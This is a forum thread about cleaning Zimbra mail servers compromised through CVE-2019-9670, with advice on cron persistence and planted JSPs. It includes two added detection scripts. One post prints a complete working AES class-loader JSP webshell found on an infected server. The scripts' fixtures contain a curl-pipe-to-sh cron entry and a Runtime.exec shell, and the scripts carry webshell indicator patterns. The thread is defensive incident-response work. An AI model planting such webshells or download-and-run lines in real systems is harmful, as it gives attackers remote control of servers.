
Re: CVE-2019-9670 being actively exploited

Posted: Mon May 27, 2019 8:00 pm
by Stemond11
Hi ng

My Zimbra machine is compromised.
If I delete the zmswatch script and the zmswatch crontab entry, after a few hours the script returns.
How can I find the source malware?
How can I delete the script definitively?

Please help me!!
Thanks, Stefano

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 1:04 am
by tin
Have a read over the whole thread.... I'll give a few thoughts here, but this is not everything...

You've most likely got a cron job re-downloading the malicious script. There may also be malicious js files scattered through the jetty/webapps folders.

I found that uninstalling wget and curl stopped the scripts from reinfecting. This may give you a better chance to clean things up, but they may also use other tricks.

Start planning how you can migrate to a clean install on a clean OS. Do not assume you have cleaned it all out.

Disable SSH access from outside the local network if you are working on the same network the server is located on. Some of the attacks appear to have sent the zimbra SSH keys to the attacker, allowing them SSH access until you can regenerate those keys.
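The persistence hunt tin describes, as an added example that is not code from this thread or from Zimbra: it checks every user's crontab (not only zimbra's) for fetch-and-run entries, lists the public keys the zimbra user's authorized_keys currently trusts, and finds recently modified JSP/JS files under a web tree. The indicator regex, the spool paths and the fixture built by make_sample are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from this thread or from Zimbra): hunt the two persistence
# mechanisms tin describes, a cron entry that re-fetches the script and attacker
# SSH keys, across every user's crontab rather than only zimbra's. The tree built
# by make_sample is constructed for illustration.

# Cron commands that fetch-and-run, decode payloads, or live in ramdisk/dotfile
# paths (assumption: common downloader persistence). Plain /tmp paths are not
# an indicator on their own because legitimate cron jobs log there too.
CRON_IOC='(wget|curl)[^|;&]*[|;&]+[[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/dev/shm/|/tmp/\.|/var/tmp/\.|zmswatch|python[23]?[[:space:]]+-c|perl[[:space:]]+-e'

# Print "lineno:line" for every non-comment line of one crontab that matches.
flag_cron_lines() {
    grep -nE "$CRON_IOC" "$1" | grep -vE '^[0-9]+:[[:space:]]*#' || true
}

# Walk the per-user spool (Debian/Ubuntu: /var/spool/cron/crontabs,
# RHEL/CentOS: /var/spool/cron) plus /etc/crontab and /etc/cron.d, so an entry
# planted in root's or another user's crontab is not missed.
hunt_cron() {
    spool="$1"; etc="$2"
    for f in "$spool"/* "$etc"/crontab "$etc"/cron.d/*; do
        [ -f "$f" ] || continue
        flag_cron_lines "$f" | sed "s|^|$f:|"
    done
}

# Number of public keys in an authorized_keys file (0 if the file is absent).
count_authorized_keys() {
    [ -f "$1" ] || { echo 0; return; }
    grep -cE '^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp[0-9]+) ' "$1" || true
}

# The comment field of each key: the quickest way to spot one nobody added.
authorized_key_comments() {
    awk '$1 ~ /^(ssh-|ecdsa-)/ { print $3 }' "$1"
}

# Files under a web tree modified in the last N days, for the JS/JSP files
# tin says get scattered through jetty/webapps.
recent_files() {
    find "$1" -type f \( -name '*.jsp' -o -name '*.js' -o -name '*.jsp.*' \) -mtime -"$2" | sort
}

# Constructed fixture: a zimbra crontab with a benign-looking log job and the
# zmswatch entry from this thread, a root crontab with a fetch-and-run line,
# an authorized_keys holding one unexpected key, and one freshly planted .js.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/spool" "$d/etc/cron.d" "$d/home/zimbra/.ssh" "$d/webapps/zimbra/js"
    cat > "$d/spool/zimbra" <<'EOF'
# constructed crontab for user zimbra
0 2 * * * /opt/zimbra/libexec/zmlogprocess > /tmp/logprocess.out 2>&1
*/30 * * * * /opt/zimbra/log/zmswatch
EOF
    cat > "$d/spool/root" <<'EOF'
*/10 * * * * curl -fsSL http://203.0.113.10/x.sh | sh
EOF
    printf 'ssh-rsa AAAAconstructed zimbra@mail\nssh-ed25519 AAAAconstructed unknown@attacker\n' \
        > "$d/home/zimbra/.ssh/authorized_keys"
    echo 'document.write("constructed")' > "$d/webapps/zimbra/js/planted.js"
    echo "$d"
}

# Stand-alone run on the fixture. On a real server run as root with, e.g.,
#   hunt_cron /var/spool/cron/crontabs /etc
#   authorized_key_comments /opt/zimbra/.ssh/authorized_keys   (zimbra's home, assumed /opt/zimbra)
#   recent_files /opt/zimbra/mailboxd/webapps 30
sample=$(make_sample)
hunt_cron "$sample/spool" "$sample/etc"
authorized_key_comments "$sample/home/zimbra/.ssh/authorized_keys"
recent_files "$sample/webapps" 1
```

On the fixture, hunt_cron flags only the zmswatch line in zimbra's crontab and the curl-pipe-to-sh line in root's, while the benign zmlogprocess job that merely writes to /tmp is left alone. Any key comment you do not recognise is a reason to regenerate the zimbra SSH keys (Zimbra ships zmsshkeygen and zmupdateauthkeys for that) rather than just delete the line.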

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 5:31 am
by maxxer
Stemond11 wrote: Hi ng
How can I find the source malware?
How can I delete the script definitively?


Read the whole thread and/or the blog post linked here; you will find guidelines on how to clean up your system.

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 7:35 am
by Stemond11
In a previous post the ZMCAT solutions were posted.
I have zmswatch in crontab and after I delete/kill it, it comes back!

In /tmp, JSP requests like this one appear every 30 seconds and are read-only:
WHY??

<Configure class="org.eclipse.jetty.webapp.WebAppContext">
  <Get name="securityHandler">
    <Set name="loginService">
      <New class="com.zimbra.cs.servlet.ZimbraLoginService">
        <Set name="name">Zimbra</Set>
      </New>
    </Set>
    <Set name="authenticatorFactory">
      <New class="com.zimbra.cs.servlet.ZimbraAuthenticatorFactory">
        <Set name="urlPattern">//downloads/*</Set>
      </New>
    </Set>
  </Get>
</Configure>

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 7:35 am
by maxxer
Stemond11 wrote: In a previous post the ZMCAT solutions were posted.
I have zmswatch in crontab and after I delete/kill it, it comes back!

It's the same infection, just more widely spread on the system. The cleanup steps are basically the same: first of all patch your system, then clean up all the mess: cron, unwanted JSPs and so on.

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 7:42 am
by Stemond11
I have just deleted the crontab.
Where do I find the unwanted JSPs?
Here? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp

thank you
Stefano

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 8:00 am
by elby
maxxer wrote:
Stemond11 wrote: In a previous post the ZMCAT solutions were posted.
I have zmswatch in crontab and after I delete/kill it, it comes back!

It's the same infection, just more widely spread on the system. The cleanup steps are basically the same: first of all patch your system, then clean up all the mess: cron, unwanted JSPs and so on.


After:
===


What should I clean up?
How do I figure out which JSP files are the unwanted ones?

Thanks,

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 8:14 am
by AB_Zimbra
Stemond11 wrote: I have just deleted the crontab.
Where do I find the unwanted JSPs?
Here? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp

thank you
Stefano


The infection creates new JSPs and edits existing ones with "control code". This way the attacker can remotely execute commands on your compromised system. Patching after infection is not enough; you need to find all those "backdoors" and remove them or replace them with the ones from the source (install packages).

Please read the blog on maxxer's site, which he linked to at the start of this topic.

This might be hard if you're not an experienced sysadmin. Maybe this will help you to find those files:


grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 8:18 am
by zimbraxtc
Hello all!

I have the same issue on an 8.6 Ubuntu.

- added patch
- clean /var/spool/cron/crontabs/zimbra (line at the end)
- clean /opt/zimbra/log/zmswatch and zmswatch.sh
- removed added email-accounts (only one)
- changed the admin-pass for zimbra-user
- can't find any strange .jsp files.
- clean /opt/zimbra/data/tmp/.zmswatch.xxx files

zmswatch still popping up...

After cleaning as above, zmswatch started without the zimbra server running.

Any ideas or thoughts about this?

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 9:05 am
by mqaroush
[root@xxxx ]# grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp.ORG:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/work/zimbra/org/apache/jsp/public_/Offline_jsp.java: out.print(request.getParameter("retryOnError"));

What does this mean???
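Read literally, the XZimbra.jsp that the grep returned is a class loader, not a command shell: a request carrying the long random parameter name makes it mint a 16-character key, store it in the session and echo it back; every later request in that session has its body base64-decoded, AES-decrypted (Cipher mode 2 is DECRYPT_MODE) with that key and handed to defineClass, and the resulting class is instantiated with the page context. The attacker therefore runs arbitrary Java inside mailboxd without a command string ever appearing in a parameter, which is why a grep for Runtime.exec alone would not find it, and the identical XZimbra.jsp.ORG beside it is a second copy that has to go as well. The third hit, Offline_jsp.java echoing retryOnError, is Zimbra's own generated servlet and is benign. The script below, an added example that is not code from this thread or from Zimbra, turns that distinction into a triage for the broad grep AB_Zimbra suggested and for elby's question of which JSPs are unwanted: it scores each file against indicators for the loader pattern above and for ordinary exec shells. The indicator set and the fixture built by make_sample_tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from this thread or from Zimbra): triage the hits of a
# broad grep by scoring each JSP/Java file for webshell traits. The first five
# indicators describe the class-loading shell quoted in this thread; the rest
# cover ordinary command-execution shells. The tree built by make_sample_tree
# is constructed for illustration.
INDICATORS='classloader:extends ClassLoader
defineclass:defineClass\(
aes:Cipher\.getInstance
base64:BASE64Decoder|Base64\.getDecoder
rawbody:request\.getReader\(\)\.readLine
exec:Runtime\.getRuntime\(\)\.exec
procbuilder:ProcessBuilder
randparam:request\.getParameter\("[A-Za-z0-9_-]{20,}"\)'

# Print "<score> <file> <matched indicator names>" for one file.
score_file() {
    f="$1"; score=0; hits=""
    while IFS=: read -r name pat; do
        [ -n "$name" ] || continue
        if grep -qE -- "$pat" "$f"; then
            score=$((score + 1)); hits="$hits $name"
        fi
    done <<EOF
$INDICATORS
EOF
    echo "$score $f$hits"
}

# Score every JSP, JSP-like, or generated servlet source under a tree and print
# those at or above a minimum score, highest first. The '*.jsp.*' pattern
# catches backup copies such as the XZimbra.jsp.ORG left beside the shell.
scan_tree() {
    dir="$1"; min="$2"
    find "$dir" -type f \( -name '*.jsp' -o -name '*.jspx' -o -name '*.jsp.*' -o -name '*.java' \) \
        | while read -r f; do
            line=$(score_file "$f")
            if [ "${line%% *}" -ge "$min" ]; then echo "$line"; fi
        done | sort -rn
}

# Constructed fixture mirroring the three grep hits above: a non-functional
# stand-in with the loader's traits (plus its .ORG copy), a one-line exec
# shell, and Zimbra's benign generated servlet.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/webapps/zimbra/js/zimbra/csfe" "$d/work/zimbra/org/apache/jsp/public_"
    cat > "$d/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp" <<'EOF'
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%! class U extends ClassLoader { U(ClassLoader c){super(c);} public Class g(byte[] b){return super.defineClass(b,0,b.length);} } %>
<% if (request.getParameter("AbCdEf0123456789AbCdEf0123") != null) { /* constructed: key handshake omitted */ }
   Cipher c = Cipher.getInstance("AES");
   new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))); %>
EOF
    cp "$d/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp" "$d/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp.ORG"
    echo '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>' > "$d/webapps/zimbra/cmd.jsp"
    echo 'out.print(request.getParameter("retryOnError"));' > "$d/work/zimbra/org/apache/jsp/public_/Offline_jsp.java"
    echo "$d"
}

# Stand-alone run on the fixture. On a real server, as root:
#   scan_tree /opt/zimbra/mailboxd 1
# and compare every hit with the file from the install packages before deleting.
scan_tree "$(make_sample_tree)" 1
```

On the fixture the loader and its .ORG copy score 6, the exec one-liner scores 1 and the retryOnError servlet scores 0, so sorting by score puts the files to remove at the top and leaves Zimbra's own parameter echo out of the list. A score of 1 on a file you did not expect still deserves a look; the point of the score is ordering the work, not deciding it.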